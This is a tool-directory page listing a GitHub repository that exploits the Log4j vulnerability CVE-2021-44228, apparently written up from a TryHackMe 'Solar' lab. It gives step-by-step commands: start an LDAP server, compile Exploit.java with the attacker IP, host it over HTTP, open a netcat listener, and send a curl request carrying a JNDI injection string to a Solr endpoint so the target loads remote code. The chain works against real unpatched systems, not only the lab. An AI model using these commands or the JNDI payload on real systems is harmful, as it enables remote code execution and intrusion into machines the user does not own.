Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
log4j | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/log4j
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubh3x0v3rl0rd/log4j

log4j

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

💻 -h3x0v3rl0rd-

exploiting log4j CVE-2021-44228 ( TryHackMe Solar, Walkthrough)

root@kitploit:~
git clone https://github.com/n3rdh4x0r/log4j.git 

1. run log4j.py (This whill install all the nessasary applications and start the LDAP server)

root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251

image

2. Add attacker IP to Exploit.java file

2021-12-19_00-52

3. Compile payload

root@kitploit:~
javac Exploit.java -source 8 -target 8

image

4. temporary HTTP server

root@kitploit:~
python3 -m http.server 8888

image

5. netcat listener

root@kitploit:~
nc -lnvp 9999

image

6. Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax! Note the changes in port number (now referring to our LDAP server) and the resource we retrieve, specifying our exploit:

root@kitploit:~
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

image

image

Download Tool